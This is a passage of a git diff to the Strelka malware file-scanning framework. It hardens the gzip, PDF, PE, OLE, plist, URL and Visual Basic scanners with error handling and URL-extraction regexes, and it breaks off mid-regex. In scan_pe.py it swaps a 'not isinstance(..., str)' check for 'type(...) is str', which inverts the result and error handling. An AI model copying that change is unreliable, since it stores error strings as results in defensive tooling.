diff --git a/configs/python/backend/backend.yaml b/configs/python/backend/backend.yaml index 21035abe..57ebdc2c 100644 --- a/configs/python/backend/backend.yaml +++ b/configs/python/backend/backend.yaml @@ -211,7 +211,6 @@ scanners: - 'html_file' priority: 5 options: - parser: "html5lib" max_hyperlinks: 50 # 'ScanIni': # - positive: @@ -613,6 +612,7 @@ scanners: flavors: - 'vb_file' - 'vbscript' + - 'hta_file' priority: 5 'ScanVba': - positive: diff --git a/src/python/strelka/scanners/scan_gzip.py b/src/python/strelka/scanners/scan_gzip.py index f9d2ef10..318a9364 100644 --- a/src/python/strelka/scanners/scan_gzip.py +++ b/src/python/strelka/scanners/scan_gzip.py @@ -1,5 +1,6 @@ import gzip import io +import zlib from strelka import strelka @@ -8,10 +9,17 @@ class ScanGzip(strelka.Scanner): """Decompresses gzip files.""" def scan(self, data, file, options, expire_at): - with io.BytesIO(data) as gzip_io: - with gzip.GzipFile(fileobj=gzip_io) as gzip_obj: - decompressed = gzip_obj.read() - self.event["size"] = len(decompressed) + try: + with io.BytesIO(data) as gzip_io: + with gzip.GzipFile(fileobj=gzip_io) as gzip_obj: + decompressed = gzip_obj.read() + self.event["size"] = len(decompressed) - # Send extracted file back to Strelka - self.emit_file(decompressed, name=file.name) + # Send extracted file back to Strelka + self.emit_file(decompressed, name=file.name) + except gzip.BadGzipFile: + self.flags.append("bad_gzip_file") + except zlib.error: + self.flags.append("bad_gzip_file") + except EOFError: + self.flags.append("eof_error") diff --git a/src/python/strelka/scanners/scan_ocr.py b/src/python/strelka/scanners/scan_ocr.py index d44f4c5d..c359b668 100644 --- a/src/python/strelka/scanners/scan_ocr.py +++ b/src/python/strelka/scanners/scan_ocr.py @@ -39,8 +39,10 @@ def scan(self, data, file, options, expire_at): # Convert PDF to PNG if required. 
if pdf_to_png and "application/pdf" in file.flavors.get("mime", []): try: - doc = fitz.open(stream=data, filetype="pdf") - data = doc.get_page_pixmap(0).tobytes("png") + reader = fitz.open(stream=data, filetype="pdf") + if reader.is_encrypted: + return + data = reader.get_page_pixmap(0).tobytes("png") except Exception as e: self.flags.append( f"{self.__class__.__name__}: image_pdf_error: {str(e)[:50]}" diff --git a/src/python/strelka/scanners/scan_ole.py b/src/python/strelka/scanners/scan_ole.py index 1f92491f..9af0c044 100644 --- a/src/python/strelka/scanners/scan_ole.py +++ b/src/python/strelka/scanners/scan_ole.py @@ -10,6 +10,7 @@ class ScanOle(strelka.Scanner): """Extracts files from OLECF files.""" def scan(self, data, file, options, expire_at): + ole = None self.event["total"] = {"streams": 0, "extracted": 0} try: @@ -47,5 +48,5 @@ def scan(self, data, file, options, expire_at): except OSError: self.flags.append("os_error") finally: - # TODO this should be wrapped with another try / catch as the variable assignment is not guaranteed - ole.close() + if ole: + ole.close() diff --git a/src/python/strelka/scanners/scan_pdf.py b/src/python/strelka/scanners/scan_pdf.py index d94a1567..f949a6d4 100644 --- a/src/python/strelka/scanners/scan_pdf.py +++ b/src/python/strelka/scanners/scan_pdf.py @@ -65,44 +65,48 @@ def scan(self, data, file, options, expire_at): # Set maximum XREF objects to be collected (default: 250) max_objects = options.get("max_objects", 250) - # Set Default Variables - self.event["images"] = 0 - self.event["lines"] = 0 - self.event["links"] = [] - self.event["words"] = 0 - self.event.setdefault("xref_object", list()) - keys = list() - try: with io.BytesIO(data) as pdf_io: reader = fitz.open(stream=pdf_io, filetype="pdf") # Collect Metadata + self.event["dirty"] = reader.is_dirty + self.event["encrypted"] = reader.is_encrypted + self.event["language"] = reader.language + self.event["needs_pass"] = reader.needs_pass + self.event["old_xrefs"] = reader.has_old_style_xrefs + self.event["pages"] = reader.page_count + self.event["repaired"] = reader.is_repaired + self.event["xrefs"] = reader.xref_length() - 1 + + if reader.is_encrypted: + return + + # Set Default Variables + self.event["images"] = 0 + self.event["lines"] = 0 + self.event["links"] = [] + self.event["words"] = 0 + self.event.setdefault("xref_object", list()) + keys = list() + self.event["author"] = reader.metadata["author"] self.event["creator"] = reader.metadata["creator"] self.event["creation_date"] = self._convert_timestamp( reader.metadata["creationDate"] ) - self.event["dirty"] = reader.is_dirty self.event["embedded_files"] = { "count": reader.embfile_count(), "names": reader.embfile_names(), } - self.event["encrypted"] = reader.is_encrypted - self.event["needs_pass"] = reader.needs_pass self.event["format"] = reader.metadata["format"] self.event["keywords"] = reader.metadata["keywords"] - self.event["language"] = reader.language self.event["modify_date"] = self._convert_timestamp( reader.metadata["modDate"] ) - self.event["old_xrefs"] = reader.has_old_style_xrefs - self.event["pages"] = reader.page_count self.event["producer"] = reader.metadata["producer"] - self.event["repaired"] = reader.is_repaired self.event["subject"] = reader.metadata["subject"] self.event["title"] = reader.metadata["title"] - self.event["xrefs"] = reader.xref_length() - 1 # Collect Phones Numbers phones = [] @@ -129,7 +133,9 @@ def scan(self, data, file, options, expire_at): if pattern in xref_object: keys.append(obj.lower()) # 
Extract urls from xref - self.event["links"].extend(re.findall('"(https?://.*?)"', xref_object)) + self.event["links"].extend( + re.findall(r"https?://[^\s)>]+", xref_object) + ) self.event["objects"] = dict(Counter(keys)) # Convert unique xref_object set back to list @@ -173,12 +179,20 @@ def scan(self, data, file, options, expire_at): self.event["words"] += len( list(filter(None, page.get_text().split(" "))) ) - # extract links + # Extract links for link in page.get_links(): self.event["links"].append(link.get("uri")) text += page.get_text() + # Extract urls from text + self.event["links"].extend(re.findall(r"https?://[^\s)>]+", text)) + + # If links found, remove all duplicates. + # Deduplicate the links + if self.event["links"]: + self.event["links"] = list(set(filter(None, self.event["links"]))) + # Send extracted file back to Strelka self.emit_file(text.encode("utf-8"), name="text") diff --git a/src/python/strelka/scanners/scan_pe.py b/src/python/strelka/scanners/scan_pe.py index 4e3a9a26..6d1cb443 100644 --- a/src/python/strelka/scanners/scan_pe.py +++ b/src/python/strelka/scanners/scan_pe.py @@ -397,15 +397,18 @@ def scan(self, data, file, options, expire_at): except pefile.PEFormatError: self.flags.append("pe_format_error") return + except AttributeError: + self.flags.append("pe_attribute_error") + return if rich_dict := parse_rich(pe): - if not isinstance(rich_dict, str): + if type(rich_dict) is str: self.event["rich"] = rich_dict else: self.flags.append(rich_dict) if cert_dict := parse_certificates(data): - if not isinstance(cert_dict, str): + if type(cert_dict) is str: self.event["security"] = cert_dict else: self.flags.append(cert_dict) @@ -455,30 +458,33 @@ def scan(self, data, file, options, expire_at): # https://github.com/erocarrera/pefile/blob/master/pefile.py#L3553 if hasattr(pe, "FileInfo"): - fi = pe.FileInfo[0] # contains a single element - for i in fi: - if i.Key == b"StringFileInfo": - for st in i.StringTable: - for k, v in st.entries.items(): - if k.decode() in COMMON_FILE_INFO_NAMES: - self.event["file_info"][ - COMMON_FILE_INFO_NAMES[k.decode()] - ] = v.decode() - else: - self.event["file_info"]["string"].append( - { - "name": k.decode(), - "value": v.decode(), - } - ) - elif i.Key == b"VarFileInfo": - for v in i.Var: - if translation := v.entry.get(b"Translation"): - (lang, char) = translation.split() - self.event["file_info"]["var"] = { - "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)), - "character_set": VAR_FILE_INFO_CHARS.get(int(char, 16)), - } + if pe.FileInfo: + fi = pe.FileInfo[0] # contains a single element + for i in fi: + if i.Key == b"StringFileInfo": + for st in i.StringTable: + for k, v in st.entries.items(): + if k.decode() in COMMON_FILE_INFO_NAMES: + self.event["file_info"][ + COMMON_FILE_INFO_NAMES[k.decode()] + ] = v.decode() + else: + self.event["file_info"]["string"].append( + { + "name": k.decode(), + "value": v.decode(), + } + ) + elif i.Key == b"VarFileInfo": + for v in i.Var: + if translation := v.entry.get(b"Translation"): + (lang, char) = translation.split() + self.event["file_info"]["var"] = { + "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)), + "character_set": VAR_FILE_INFO_CHARS.get( + int(char, 16) + ), + } if hasattr(pe, "VS_FIXEDFILEINFO"): vs_ffi = pe.VS_FIXEDFILEINFO[0] # contains a single element @@ -509,7 +515,7 @@ def scan(self, data, file, options, expire_at): self.event["header"] = { "machine": { "id": pe.FILE_HEADER.Machine, - "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine).replace( + "type": 
pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine, "").replace( "IMAGE_FILE_MACHINE_", "" ), }, @@ -518,7 +524,7 @@ def scan(self, data, file, options, expire_at): "image": MAGIC_IMAGE.get(pe.OPTIONAL_HEADER.Magic, ""), }, "subsystem": pefile.SUBSYSTEM_TYPE.get( - pe.OPTIONAL_HEADER.Subsystem + pe.OPTIONAL_HEADER.Subsystem, "" ).replace("IMAGE_SUBSYSTEM_", ""), } @@ -600,43 +606,48 @@ def scan(self, data, file, options, expire_at): resource_sha256_set = set() for res0 in pe.DIRECTORY_ENTRY_RESOURCE.entries: - for res1 in res0.directory.entries: - for res2 in res1.directory.entries: - lang = res2.data.lang - sub = res2.data.sublang - sub = pefile.get_sublang_name_for_lang(lang, sub) - data = pe.get_data( - res2.data.struct.OffsetToData, res2.data.struct.Size - ) - - resource_md5 = hashlib.md5(data).hexdigest() - resource_sha1 = hashlib.sha1(data).hexdigest() - resource_sha256 = hashlib.sha256(data).hexdigest() - - resource_md5_set.add(resource_md5) - resource_sha1_set.add(resource_sha1) - resource_sha256_set.add(resource_sha256) - - resource_dict = { - "id": res1.id, - "language": {"sub": sub.replace("SUBLANG_", "")}, - "type": pefile.RESOURCE_TYPE.get(res0.id, "").replace( - "RT_", "" - ), - "md5": resource_md5, - "sha1": resource_sha1, - "sha256": resource_sha256, - } - - if lang in pefile.LANG: - resource_dict["language"]["primary"] = pefile.LANG[ - lang - ].replace("LANG_", "") - - if res1.name: - resource_dict["name"] = str(res1.name) - - self.event["resources"].append(resource_dict) + if hasattr(res0, "directory"): + for res1 in res0.directory.entries: + if hasattr(res1, "directory"): + for res2 in res1.directory.entries: + lang = res2.data.lang + sub = res2.data.sublang + sub = pefile.get_sublang_name_for_lang(lang, sub) + try: + data = pe.get_data( + res2.data.struct.OffsetToData, + res2.data.struct.Size, + ) + except pefile.PEFormatError: + continue + resource_md5 = hashlib.md5(data).hexdigest() + resource_sha1 = hashlib.sha1(data).hexdigest() + resource_sha256 = hashlib.sha256(data).hexdigest() + + resource_md5_set.add(resource_md5) + resource_sha1_set.add(resource_sha1) + resource_sha256_set.add(resource_sha256) + + resource_dict = { + "id": res1.id, + "language": {"sub": sub.replace("SUBLANG_", "")}, + "type": pefile.RESOURCE_TYPE.get( + res0.id, "" + ).replace("RT_", ""), + "md5": resource_md5, + "sha1": resource_sha1, + "sha256": resource_sha256, + } + + if lang in pefile.LANG: + resource_dict["language"]["primary"] = pefile.LANG[ + lang + ].replace("LANG_", "") + + if res1.name: + resource_dict["name"] = str(res1.name) + + self.event["resources"].append(resource_dict) # TODO: Add optional resource extraction diff --git a/src/python/strelka/scanners/scan_plist.py b/src/python/strelka/scanners/scan_plist.py index 61c82701..08e19a0d 100644 --- a/src/python/strelka/scanners/scan_plist.py +++ b/src/python/strelka/scanners/scan_plist.py @@ -20,20 +20,21 @@ def scan(self, data, file, options, expire_at): plist = plistlib.loads(data) self.event["keys"] = [] - for k, v in plist.items(): - if keys and k not in keys: - continue - - try: - v = ast.literal_eval(v) - except (ValueError, SyntaxError): - pass - - self.event["keys"].append( - { - "key": k, - "value": v, - } - ) + if isinstance(plist, dict): + for k, v in plist.items(): + if keys and k not in keys: + continue + + try: + v = ast.literal_eval(v) + except (ValueError, SyntaxError): + pass + + self.event["keys"].append( + { + "key": k, + "value": v, + } + ) except xml.parsers.expat.ExpatError: self.flags.append("invalid_format") diff 
--git a/src/python/strelka/scanners/scan_url.py b/src/python/strelka/scanners/scan_url.py index 1e05784a..599d1940 100644 --- a/src/python/strelka/scanners/scan_url.py +++ b/src/python/strelka/scanners/scan_url.py @@ -24,6 +24,8 @@ class ScanUrl(strelka.Scanner): """ def init(self): + # Default compiled regex pattern for URL extraction. + # This default pattern aims to match a wide range of URLs including those with TLDs. self.regexes = { "default": re.compile( rb'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|f
utbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|schola
rships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3
hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))' @@ -31,19 +33,28 @@ def init(self): } def scan(self, data, file, options, expire_at): - regex = options.get("regex", False) - if regex: - ((key, value),) = regex.items() - if key not in self.regexes: - self.regexes[key] = re.compile(value.encode()) - url_regex = self.regexes[key] - else: - url_regex = self.regexes["default"] - - normalized_data = b" ".join(data.split()) - self.event.setdefault("urls", []) - urls = url_regex.findall(normalized_data) - for url in urls: - url = url.strip(b"!\"#$%&'()*+,-./@:;<=>[\\]^_`{|}~") - if url not in self.event["urls"]: - self.event["urls"].append(url) + try: + # Obtain regex pattern from options or use the default one. + regex_key = options.get("regex", "default") + if regex_key not in self.regexes and regex_key in options: + # Compile and store the custom regex if provided and not already compiled. + self.regexes[regex_key] = re.compile(options[regex_key].encode()) + + url_regex = self.regexes[regex_key] + + # Normalize data: replace multiple whitespace characters with a single space. + normalized_data = re.sub(rb"\s+", b" ", data) + + # Initialize 'urls' event list to store extracted URLs. + self.event.setdefault("urls", []) + + # Find all URLs using the regex pattern. + urls = set(url_regex.findall(normalized_data)) + for url in urls: + # Strip leading and trailing punctuation characters from the URL. + clean_url = url.strip(b"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~").decode() + if clean_url not in self.event["urls"]: + self.event["urls"].append(clean_url) + + except Exception as e: + self.flags.append(f"scanner_error: {e}") diff --git a/src/python/strelka/scanners/scan_vb.py b/src/python/strelka/scanners/scan_vb.py index dfcd654b..8fd51674 100644 --- a/src/python/strelka/scanners/scan_vb.py +++ b/src/python/strelka/scanners/scan_vb.py @@ -1,3 +1,5 @@ +import re + import pygments from pygments import formatters, lexers @@ -5,58 +7,143 @@ class ScanVb(strelka.Scanner): - """Collects metadata from Visual Basic script files. + """ + Scanner for Visual Basic (VB) script files. + + This scanner parses VB script files to extract various components like comments, + function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to + tokenize the script data and then extracts useful information from these tokens. Attributes: - lexer: Pygments lexer ('vbnet') used to parse the file. + lexer: A Pygments lexer object for tokenizing VB.NET scripts. + url_regex: A compiled regex pattern for extracting URLs from the script. """ def init(self): + # Initialize the lexer for VB.NET language using Pygments self.lexer = lexers.get_lexer_by_name("vbnet") - def scan(self, data, file, options, expire_at): - highlight = pygments.highlight( - data, - self.lexer, - formatters.RawTokenFormatter(), + # Regular expression to capture URLs, considering various schemes and TLDs. 
+ self.url_regex = re.compile( + r'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchann